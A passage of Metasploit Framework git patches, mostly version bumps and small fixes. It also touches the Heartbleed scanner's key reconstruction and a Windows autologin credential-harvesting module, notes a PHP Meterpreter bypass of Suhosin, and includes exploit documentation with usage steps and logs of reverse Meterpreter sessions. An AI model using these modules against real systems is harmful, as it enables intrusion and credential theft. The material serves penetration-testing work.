b/lib/rex/post/hwbridge/extensions/rftransceiver/rftransceiver.rb @@ -186,6 +186,10 @@ class RFTransceiver < Extension client.send_request("/rftransceiver/#{idx}/set_number_preamble?num=#{num}") end + def set_lowball(idx) + client.send_request("/rftransceiver/#{idx}/set_lowball") + end + def set_maxpower(idx) client.send_request("/rftransceiver/#{idx}/set_maxpower") end diff --git a/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb b/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb index f2f3b4ec26..d8885e8a6d 100644 --- a/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb +++ b/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb @@ -34,6 +34,7 @@ class Console::CommandDispatcher::RFtransceiver 'deviation' => 'sets the deviation', 'sync_word' => 'sets the sync word', 'preamble' => 'sets the preamble number', + 'lowball' => 'sets lowball' 'power' => 'sets the power level', 'maxpower' => 'sets max power' } @@ -528,6 +529,20 @@ class Console::CommandDispatcher::RFtransceiver print_success(r) end + def cmd_lowball_help + print_line("Lowball is frequency dependent. Set frequency first") + end + + def cmd_lowball(*args) + self.idx ||= 0 + if args.length.positive? + cmd_lowball_help + return + end + r = client.rftransceiver.set_lowball(idx) + print_success(r) + end + def cmd_maxpower_help print_line("Max power is frequency dependent. Set frequency first") end From 1d0db02a64db4cbe9381820d3a9e4339d54e490a Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 20 Jul 2017 09:10:19 -0500 Subject: [PATCH 49/63] bump payloads --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index d19609ffa3..657a706da9 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -30,7 +30,7 @@ PATH metasploit-model metasploit-payloads (= 1.2.37) metasploit_data_models - metasploit_payloads-mettle (= 0.1.13) + metasploit_payloads-mettle (= 0.1.14) msgpack nessus_rest net-ssh @@ -189,7 +189,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.1.13) + metasploit_payloads-mettle (0.1.14) method_source (0.8.2) mini_portile2 (2.2.0) minitest (5.10.2) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 4b6614e1b3..68cdb6e924 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -72,7 +72,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.2.37' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.13' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From d0aeef9f8e24d6e962c6a8e1280d6fef35b58012 Mon Sep 17 00:00:00 2001 From: Samuel Huckins Date: Thu, 20 Jul 2017 09:32:52 -0500 Subject: [PATCH 50/63] Removed dead SourceForge link --- README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index ba8aace800..1f81cd5294 100644 --- a/README.md +++ b/README.md @@ -14,8 +14,7 @@ New bugs and feature requests should be directed to: API documentation for writing modules can be found at: https://rapid7.github.io/metasploit-framework/api -Questions and suggestions can be sent to: - https://lists.sourceforge.net/lists/listinfo/metasploit-hackers +Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list Installing -- From c5101b71a0c659503f8f71e5d463bd1a01962e17 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 20 Jul 2017 23:21:19 -0500 Subject: [PATCH 51/63] bump rex-core, reverting threadsafe select changes --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index ba7dbd295d..cbe79418fc 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -256,7 +256,7 @@ GEM rex-core rex-struct2 rex-text - rex-core (0.1.11) + rex-core (0.1.12) rex-encoder (0.1.4) metasm rex-arch From 3043218a7f6b1d04ffdec614e972418c13c9718f Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Fri, 21 Jul 2017 11:43:49 -0500 Subject: [PATCH 52/63] Indention and missing comma fixup. --- .../hwbridge/ui/console/command_dispatcher/rftransceiver.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb b/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb index d8885e8a6d..0e3de354f4 100644 --- a/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb +++ b/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb @@ -34,7 +34,7 @@ class Console::CommandDispatcher::RFtransceiver 'deviation' => 'sets the deviation', 'sync_word' => 'sets the sync word', 'preamble' => 'sets the preamble number', - 'lowball' => 'sets lowball' + 'lowball' => 'sets lowball', 'power' => 'sets the power level', 'maxpower' => 'sets max power' } From 50474a1ea7b93fa09373699753dae783970ab31d Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 21 Jul 2017 10:03:44 -0700 Subject: [PATCH 53/63] Bump version of framework to 4.15.4 --- Gemfile.lock | 10 +++++----- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index cbe79418fc..e45c930d3e 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ GIT PATH remote: . specs: - metasploit-framework (4.15.3) + metasploit-framework (4.15.4) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -128,13 +128,13 @@ GEM factory_girl_rails (4.8.0) factory_girl (~> 4.8.0) railties (>= 3.0.0) - faraday (0.12.1) + faraday (0.12.2) multipart-post (>= 1.2, < 3) filesize (0.1.1) fivemat (1.3.5) google-protobuf (3.3.0) - googleauth (0.5.1) - faraday (~> 0.9) + googleauth (0.5.2) + faraday (~> 0.12) jwt (~> 1.4) logging (~> 2.0) memoist (~> 0.12) @@ -192,7 +192,7 @@ GEM metasploit_payloads-mettle (0.1.14) method_source (0.8.2) mini_portile2 (2.2.0) - minitest (5.10.2) + minitest (5.10.3) msgpack (1.1.0) multi_json (1.12.1) multipart-post (2.0.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 712ec5a517..f068d52e15 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.15.3" + VERSION = "4.15.4" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 5d04775f5ec6adeff5fa48bb409a72f6ee7496d6 Mon Sep 17 00:00:00 2001 From: Evgeny Naumov Date: Fri, 21 Jul 2017 16:28:07 -0400 Subject: [PATCH 54/63] use 2.4 OpenSSL::PKey::RSA api --- .../scanner/ssl/openssl_heartbleed.rb | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index a1182e221a..f88d51f105 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -631,19 +631,19 @@ class MetasploitModule < Msf::Auxiliary def key_from_pqe(p, q, e) # Returns an RSA Private Key from Factors key = OpenSSL::PKey::RSA.new() + key.set_factors(p, q) - key.p = p - key.q = q - - key.n = key.p*key.q - key.e = e - + n = key.p * key.q phi = (key.p - 1) * (key.q - 1 ) - key.d = key.e.mod_inverse(phi) + d = OpenSSL::BN.new(e).mod_inverse(phi) - key.dmp1 = key.d % (key.p - 1) - key.dmq1 = key.d % (key.q - 1) - key.iqmp = key.q.mod_inverse(key.p) + key.set_key(n, e, d) + + dmp1 = key.d % (key.p - 1) + dmq1 = key.d % (key.q - 1) + iqmp = key.q.mod_inverse(key.p) + + key.set_crt_params(dmp1, dmq1, iqmp) return key end From b4bb384577329eaf363a19d54510d9a61d2e296e Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 22 Jul 2017 18:54:36 +0200 Subject: [PATCH 55/63] add @pbarry-r7 's feedback --- modules/post/windows/gather/credentials/windows_autologin.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index 2ef17660bf..6384e5786a 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -56,13 +56,13 @@ class MetasploitModule < Msf::Post du2 = registry_getvaldata(logon_key, "AltDefaultUserName") || '' dp2 = registry_getvaldata(logon_key, "AltDefaultPassword") || '' - if do1 != '' && du1 != '' && dp1 == '' + if do1 != '' && du1 != '' && (dp1 != '' || (dp1 == '' && al == '1')) has_al = 1 creds << [du1, dp1, do1] print_good("AutoAdminLogon=#{al}, DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}") end - if do2 != '' && du2 != '' && dp2 == '' + if do2 != '' && du2 != '' && (dp2 != '' || (dp2 == '' && al == '1')) has_al = 1 creds << [du2, dp2, do2] print_good("AutoAdminLogon=#{al}, AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") From 072b0dc90b08ff6b9104aea8036d8d669ade131e Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 23 Jul 2017 05:09:01 -0700 Subject: [PATCH 56/63] Hide errors in Windows Meterpreter sessions In Windows Meterpreter sessions, set newly created threads via SetThreadErrorMode to not display error popups when there are failures. --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index e45c930d3e..ba7f163ef0 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -28,7 +28,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.2.37) + metasploit-payloads (= 1.2.38) metasploit_data_models metasploit_payloads-mettle (= 0.1.14) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.2.37) + metasploit-payloads (1.2.38) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 68cdb6e924..ca457363be 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.2.37' + spec.add_runtime_dependency 'metasploit-payloads', '1.2.38' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14' # Needed by msfgui and other rpc components From 302b66c2d816e7ee3d67513d72a1e21773374f67 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 23 Jul 2017 05:26:59 -0700 Subject: [PATCH 57/63] add payloads support for OSX with python meterpreter --- Gemfile.lock | 6 +++--- metasploit-framework.gemspec | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index ba7f163ef0..afcbb6f3ac 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -28,7 +28,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.2.38) + metasploit-payloads (= 1.2.39) metasploit_data_models metasploit_payloads-mettle (= 0.1.14) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.2.38) + metasploit-payloads (1.2.39) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -377,4 +377,4 @@ DEPENDENCIES yard BUNDLED WITH - 1.15.2 + 1.15.3 diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index ca457363be..97808b0d87 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.2.38' + spec.add_runtime_dependency 'metasploit-payloads', '1.2.39' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14' # Needed by msfgui and other rpc components From 399557124f8c4d18da7767349138e1f27f0b0281 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 23 Jul 2017 05:28:32 -0700 Subject: [PATCH 58/63] update payload cached sizes --- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index ee86217655..c8fa1fed85 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 54142 + CachedSize = 54362 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index f02d2fdf6d..dc203b91f5 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 54106 + CachedSize = 54326 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index 3ae37a307f..912b05a0ef 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 54106 + CachedSize = 54326 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index 1e7bab7e11..7f826c79a4 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 54058 + CachedSize = 54278 include Msf::Payload::Single include Msf::Payload::Python From b75530b978885890c3f9b0e32c1892a639971600 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 23 Jul 2017 05:38:06 -0700 Subject: [PATCH 59/63] Fix an issue where 'sleep' with Python Meterpreter appears to fail. --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- 6 files changed, 7 insertions(+), 7 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index afcbb6f3ac..dd54c9a15e 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -28,7 +28,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.2.39) + metasploit-payloads (= 1.2.40) metasploit_data_models metasploit_payloads-mettle (= 0.1.14) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.2.39) + metasploit-payloads (1.2.40) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 97808b0d87..0710afa5cc 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.2.39' + spec.add_runtime_dependency 'metasploit-payloads', '1.2.40' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14' # Needed by msfgui and other rpc components diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index c8fa1fed85..caab279006 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 54362 + CachedSize = 54590 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index dc203b91f5..c623350dfa 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 54326 + CachedSize = 54554 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index 912b05a0ef..f7b3f04a69 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 54326 + CachedSize = 54554 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index 7f826c79a4..e4294dcb6f 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 54278 + CachedSize = 54506 include Msf::Payload::Single include Msf::Payload::Python From 7c55cdc1c8f690c39a443b61c281ba498b1cc5c8 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 23 Jul 2017 07:46:52 -0700 Subject: [PATCH 60/63] fix some module documentation 3 modules got documentation landed in the wrong spot. This also fixes a few typos and improves formatting. --- .../windows/http/easychatserver_seh.md | 24 +++++++++---------- .../windows/http/easyfilesharing_post.md | 22 ++++++++--------- .../post/windows/manage/archmigrate.md | 13 ++++++---- 3 files changed, 31 insertions(+), 28 deletions(-) rename {modules/exploits => documentation/modules/exploit}/windows/http/easychatserver_seh.md (66%) rename {modules/exploits => documentation/modules/exploit}/windows/http/easyfilesharing_post.md (73%) rename {modules => documentation/modules}/post/windows/manage/archmigrate.md (87%) diff --git a/modules/exploits/windows/http/easychatserver_seh.md b/documentation/modules/exploit/windows/http/easychatserver_seh.md similarity index 66% rename from modules/exploits/windows/http/easychatserver_seh.md rename to documentation/modules/exploit/windows/http/easychatserver_seh.md index eaf8a0744f..915985d6e7 100644 --- a/modules/exploits/windows/http/easychatserver_seh.md +++ b/documentation/modules/exploit/windows/http/easychatserver_seh.md @@ -1,16 +1,16 @@ ## Description -This module exploits a vulnerability in the EFS Easy Chat Server application, from version 2 to 3.1, affecting the username parameter in Registration page 'register.ghp', which is prone to a stack overflow vulnerability. +This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability. -This module allows a remote attacker to get a payload executed under the context of the user running the Easy Chat Server application +This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application ## Vulnerable Application -[Easy Chat Server](http://echatserver.com/) Easy Chat Server is a easy, fast and affordable way to host and manage real-time communication software. +[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software. This module has been tested successfully on -* Easy Chat Server 3.1 on Windows XP En SP3 + * Easy Chat Server 3.1 on Windows XP En SP3 Installers: @@ -18,11 +18,11 @@ Installers: ## Verification Steps -1. Start `msfconsole` -2. Do: `use exploits/windows/http/easychatserver_seh` -3. Do: `set rhosts [IP]` -4. Do: `exploit` -5. You should get your payload executed + 1. Start `msfconsole` + 2. Do: `use exploits/windows/http/easychatserver_seh` + 3. Do: `set rhosts [IP]` + 4. Do: `exploit` + 5. You should get your payload executed ## Scenarios @@ -32,11 +32,11 @@ msf > use exploit/windows/http/easychatserver_seh msf exploit(easychatserver_seh) > set RHOST 192.168.56.101 RHOST => 192.168.56.101 msf exploit(easychatserver_seh) > exploit - + [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Sending stage (957487 bytes) to 192.168.56.101 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200 - + meterpreter > sysinfo Computer : MM-8B040C5B05D9 OS : Windows XP (Build 2600, Service Pack 3). @@ -47,7 +47,7 @@ Logged On Users : 2 Meterpreter : x86/windows meterpreter > exit [*] Shutting down Meterpreter... - + [*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit msf exploit(easychatserver_seh) > ``` diff --git a/modules/exploits/windows/http/easyfilesharing_post.md b/documentation/modules/exploit/windows/http/easyfilesharing_post.md similarity index 73% rename from modules/exploits/windows/http/easyfilesharing_post.md rename to documentation/modules/exploit/windows/http/easyfilesharing_post.md index 7c2a50d2fe..92798f84fd 100644 --- a/modules/exploits/windows/http/easyfilesharing_post.md +++ b/documentation/modules/exploit/windows/http/easyfilesharing_post.md @@ -1,8 +1,8 @@ ## Description -This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain. +This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain. -This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application +This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application ## Vulnerable Application @@ -10,7 +10,7 @@ This module allows a remote attacker to get a payload executed under the context This module has been tested successfully on -* Easy File Sharing 7.2 on Windows XP En Sp3 + * Easy File Sharing 7.2 on Windows XP En Sp3 Installers: @@ -18,11 +18,11 @@ Installers: ## Verification Steps -1. Start `msfconsole` -2. Do: `use exploits/windows/http/easyfilesharing_post` -3. Do: `set rhosts [IP]` -4. Do: `exploit` -5. You should get your payload executed + 1. Start `msfconsole` + 2. Do: `use exploits/windows/http/easyfilesharing_post` + 3. Do: `set rhosts [IP]` + 4. Do: `exploit` + 5. You should get your payload executed ## Scenarios @@ -32,11 +32,11 @@ msf > use exploit/windows/http/easyfilesharing_post msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101 RHOST => 192.168.56.101 msf exploit(easyfilesharing_post) > exploit - + [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Sending stage (957487 bytes) to 192.168.56.101 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200 - + meterpreter > sysinfo Computer : MM OS : Windows XP (Build 2600, Service Pack 3). @@ -47,7 +47,7 @@ Logged On Users : 2 Meterpreter : x86/windows meterpreter > exit [*] Shutting down Meterpreter... - + [*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit msf exploit(easyfilesharing_post) > ``` diff --git a/modules/post/windows/manage/archmigrate.md b/documentation/modules/post/windows/manage/archmigrate.md similarity index 87% rename from modules/post/windows/manage/archmigrate.md rename to documentation/modules/post/windows/manage/archmigrate.md index 0b67c71ce2..dc0e4aefda 100644 --- a/modules/post/windows/manage/archmigrate.md +++ b/documentation/modules/post/windows/manage/archmigrate.md @@ -1,5 +1,6 @@ ## Creating A Testing Environment - To use this module you need an x86 executable type meterpreter on a x64 windows machine. + +To use this module you need an x86 executable type meterpreter on a x64 windows machine. This module has been tested against: @@ -23,9 +24,10 @@ This module was not tested against, but may work against: ### Windows 10 x64 +``` msf exploit(handler) > run - [*] Started reverse TCP handler on :4567 + [*] Started reverse TCP handler on :4567 [*] Starting the payload handler... [*] Sending stage (957487 bytes) to [*] Meterpreter session 1 opened (:4567 -> :50917) at 2017-03-22 11:43:42 -0500 @@ -39,8 +41,8 @@ This module was not tested against, but may work against: Logged On Users : 2 Meterpreter : x86/windows meterpreter > background - [*] Backgrounding session 1... - msf exploit(handler) > use post/windows/manage/archmigrate + [*] Backgrounding session 1... + msf exploit(handler) > use post/windows/manage/archmigrate msf post(archmigrate) > set session 1 session => 1 msf post(archmigrate) > run @@ -70,4 +72,5 @@ This module was not tested against, but may work against: System Language : en_US Domain : WORKGROUP Logged On Users : 2 - Meterpreter : x64/windows \ No newline at end of file + Meterpreter : x64/windows +``` From 85e9be0705ad77aec8af14837084c5697b9810b0 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 23 Jul 2017 12:13:15 -0700 Subject: [PATCH 61/63] only pin rb-readline on linux/osx --- Gemfile | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Gemfile b/Gemfile index 26b82335ed..482db1e239 100755 --- a/Gemfile +++ b/Gemfile @@ -6,8 +6,10 @@ gemspec name: 'metasploit-framework' # These pull in pre-release gems in order to fix specific issues. # XXX https://github.com/alexdalitz/dnsruby/pull/134 gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby' + # XXX https://github.com/ConnorAtherton/rb-readline/commit/fd882edcd145c26681f9971be5f6675c7f6d1970 -gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline' +gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline' if [ + 'x86_64-linux', 'x86-linux', 'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin')) # separate from test as simplecov is not run on travis-ci group :coverage do From 8444038c62f3baf94f329e09edebcc7aca33d9a6 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 23 Jul 2017 22:04:09 -0700 Subject: [PATCH 62/63] Add eval alternative to PHP Meterpreter to bypass suhosin See https://suhosin.org/stories/index.html for more information on this system. --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- modules/payloads/singles/php/meterpreter_reverse_tcp.rb | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index dd54c9a15e..85d5f279b9 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -28,7 +28,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.2.40) + metasploit-payloads (= 1.2.41) metasploit_data_models metasploit_payloads-mettle (= 0.1.14) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.2.40) + metasploit-payloads (1.2.41) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 0710afa5cc..bd5adc841e 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.2.40' + spec.add_runtime_dependency 'metasploit-payloads', '1.2.41' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14' # Needed by msfgui and other rpc components diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb index ff4f7e285a..843e01d2d4 100644 --- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_options' module MetasploitModule - CachedSize = 27602 + CachedSize = 27735 include Msf::Payload::Single include Msf::Payload::Php::ReverseTcp From 3bc0c18e6a2865a952740c5991e83c998e7b2ad4 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 23 Jul 2017 22:27:42 -0700 Subject: [PATCH 63/63] Properly handle threads and window destruction, add PID logging This pulls in https://github.com/rapid7/metasploit-payloads/pull/213 which fixes https://github.com/rapid7/metasploit-framework/issues/8608 and adds PID logging to verbose keyboard capture. --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 85d5f279b9..da4d18f631 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -28,7 +28,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.2.41) + metasploit-payloads (= 1.2.42) metasploit_data_models metasploit_payloads-mettle (= 0.1.14) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 